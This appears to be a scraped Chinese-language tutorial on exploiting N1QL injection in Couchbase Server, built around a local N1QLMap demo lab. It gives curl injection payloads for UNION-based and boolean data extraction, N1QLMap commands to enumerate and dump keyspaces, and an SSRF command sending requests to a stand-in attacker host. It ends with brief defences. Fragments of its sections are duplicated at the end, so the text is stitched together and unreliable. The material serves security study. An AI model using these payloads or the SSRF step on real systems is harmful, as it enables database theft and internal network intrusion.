Couchbase Server 与 N1QL注入漏洞分析与利用<\/h1>

1. 概述<\/h2>
本文详细分析Couchbase Server中的N1QL注入漏洞，这是一种类似于SQL注入的NoSQL数据库注入技术。N1QL(Non-First Normal Form Query Language)是Couchbase数据库特有的查询语言，用于处理JSON数据。<\/p>

2. Couchbase Server与N1QL简介<\/h2>

Couchbase Server是一个开源的面向文档的NoSQL数据库，主要特点包括：<\/p>

将JSON对象存储为文档<\/li>
支持N1QL查询语言（类似SQL的JSON查询语法）<\/li>

提供系统键空间(system:keyspaces)等特殊命名空间<\/li> <\/ul>

N1QL关键特性：<\/p>

支持ENCODE_JSON函数<\/li>
支持META关键字<\/li>
支持UNION SELECT等SQL类似语法<\/li>

支持系统键空间查询<\/li> <\/ul>

3. 漏洞环境搭建<\/h2>

使用提供的Docker Compose环境快速搭建测试环境：<\/p>

git clone https:\/\/github.com\/FSecureLABS\/N1QLMap.git 
<\/span><\/span>cd n1qlmap\/n1ql-demo 
<\/span><\/span>.\/quick_setup.sh
<\/span><\/span><\/code><\/pre>环境运行后访问：http:\/\/localhost:3000<\/p>
4. 漏洞识别与验证<\/h2>
4.1 基本注入检测<\/h3>
检测参数是否存在注入漏洞：<\/p>
curl -G "http:\/\/localhost:3000\/example-1\/breweries"<\/span> --data-urlencode "city='aaa"<\/span>
<\/span><\/span><\/code><\/pre>若返回syntax error<\/code>则表明存在注入点。<\/p>
4.2 判断N1QL语法<\/h3>
使用N1QL特有函数验证：<\/p>
# 使用ENCODE_JSON函数验证<\/span>
<\/span><\/span>curl -G "http:\/\/localhost:3000\/example-1\/breweries"<\/span> --data-urlencode "city=13373' OR ENCODE_JSON({}) == \"{}\" OR '1'='1"<\/span>
<\/span><\/span>
<\/span><\/span># 查询系统键空间<\/span>
<\/span><\/span>curl -G "http:\/\/localhost:3000\/example-1\/breweries"<\/span> --data-urlencode "city=13373' OR ENCODE_JSON((SELECT * FROM system:keyspaces)) != \"{}\" OR '1'='1"<\/span>
<\/span><\/span><\/code><\/pre>4.3 联合查询示例<\/h3>
查询所有可用键空间：<\/p>
curl -G "http:\/\/localhost:3000\/example-1\/breweries"<\/span> --data-urlencode "city=' AND '1'='0' UNION SELECT * FROM system:keyspaces WHERE '1'='1"<\/span>
<\/span><\/span><\/code><\/pre>5. 数据提取技术<\/h2>
5.1 基于布尔的数据提取<\/h3>
利用ENCODE_JSON函数和SUBSTR函数逐字符提取数据：<\/p>
curl -G "http:\/\/localhost:3000\/example-1\/breweries"<\/span> --data-urlencode "city=New York' AND '{' = SUBSTR(ENCODE_JSON((SELECT * FROM system:keyspaces ORDER BY id)), 1, 1) AND '1'='1"<\/span>
<\/span><\/span><\/code><\/pre>5.2 完整数据提取<\/h3>
使用ENCODE_JSON提取完整数据：<\/p>
curl -G "http:\/\/localhost:3000\/example-1\/breweries"<\/span> --data-urlencode "city=13373' UNION SELECT ENCODE_JSON((SELECT * FROM system:keyspaces ORDER BY id)) WHERE '1'='1"<\/span>
<\/span><\/span><\/code><\/pre>注意<\/strong>：使用ORDER BY确保结果顺序一致。<\/p>
6. N1QLMap工具使用<\/h2>
N1QLMap是专门针对N1QL注入开发的利用工具，主要功能包括：<\/p>
6.1 基本用法<\/h3>
标记注入点使用*i*<\/code>：<\/p>
GET \/example-1\/breweries?city=*i* HTTP\/1.1
Host: localhost:3000
[...]
<\/code><\/pre>
6.2 枚举数据存储<\/h3>
.\/n1qlMap.py http:\/\/localhost:3000 --request example_request_1.txt --keyword beer-sample --datastores
<\/span><\/span><\/code><\/pre>6.3 枚举键空间<\/h3>
.\/n1qlMap.py http:\/\/localhost:3000 --request example_request_1.txt --keyword beer-sample --keyspaces "http:\/\/127.0.0.1:8091"<\/span>
<\/span><\/span><\/code><\/pre>6.4 提取数据<\/h3>
.\/n1qlMap.py http:\/\/localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample
<\/span><\/span><\/code><\/pre>6.5 自定义查询<\/h3>
.\/n1qlMap.py http:\/\/localhost:3000 --request example_request_1.txt --keyword beer-sample --query 'SELECT * FROM `travel-sample` AS T ORDER by META(T).id LIMIT 1'<\/span>
<\/span><\/span><\/code><\/pre>7. SSRF漏洞利用<\/h2>
当Couchbase启用cURL功能时，可利用N1QL注入实现SSRF：<\/p>
.\/n1qlMap.py http:\/\/localhost:3000 --request example_request_1.txt --keyword beer-sample --curl 'attacker-server.com\/endpoint'<\/span> "{'request':'POST','data':'data','header':['User-Agent: Agent Smith']}"<\/span>
<\/span><\/span><\/code><\/pre>SSRF可实现的攻击包括：<\/p>

绕过IP限制<\/li>
访问云环境元数据端点<\/li>
内部网络探测<\/li>
<\/ul>
8. 防御措施<\/h2>

使用参数化查询<\/li>
限制N1QL查询权限<\/li>
禁用不必要的功能（如cURL）<\/li>
实施输入验证和过滤<\/li>
使用最小权限原则配置数据库账户<\/li>
<\/ol>
9. 参考资源<\/h2>

N1QL Language Reference<\/a><\/li>
Couchbase and N1QL Security<\/a><\/li>
N1QL Querying System Information<\/a><\/li>
N1QL CheatSheet (pdf)<\/a><\/li>
N1QL Interactive Tutorial<\/a><\/li>
Couchbase REST API Documentation<\/a><\/li>
<\/ol>

Couchbase Server 与 N1QL注入漏洞分析与利用<\/h1>

1. 概述<\/h2> 本文详细分析Couchbase Server中的N1QL注入漏洞，这是一种类似于SQL注入的NoSQL数据库注入技术。N1QL(Non-First Normal Form Query Language)是Couchbase数据库特有的查询语言，用于处理JSON数据。<\/p>

4. 漏洞识别与验证<\/h2>

5. 数据提取技术<\/h2>

9. 参考资源<\/h2> N1QL Language Reference<\/a><\/li> Couchbase and N1QL Security<\/a><\/li> N1QL Querying System Information<\/a><\/li> N1QL CheatSheet (pdf)<\/a><\/li> N1QL Interactive Tutorial<\/a><\/li> Couchbase REST API Documentation<\/a><\/li> <\/ol>

1. 概述<\/h2>
本文详细分析Couchbase Server中的N1QL注入漏洞，这是一种类似于SQL注入的NoSQL数据库注入技术。N1QL(Non-First Normal Form Query Language)是Couchbase数据库特有的查询语言，用于处理JSON数据。<\/p>

9. 参考资源<\/h2>

N1QL Language Reference<\/a><\/li>
Couchbase and N1QL Security<\/a><\/li>
N1QL Querying System Information<\/a><\/li>
N1QL CheatSheet (pdf)<\/a><\/li>
N1QL Interactive Tutorial<\/a><\/li>
Couchbase REST API Documentation<\/a><\/li> <\/ol>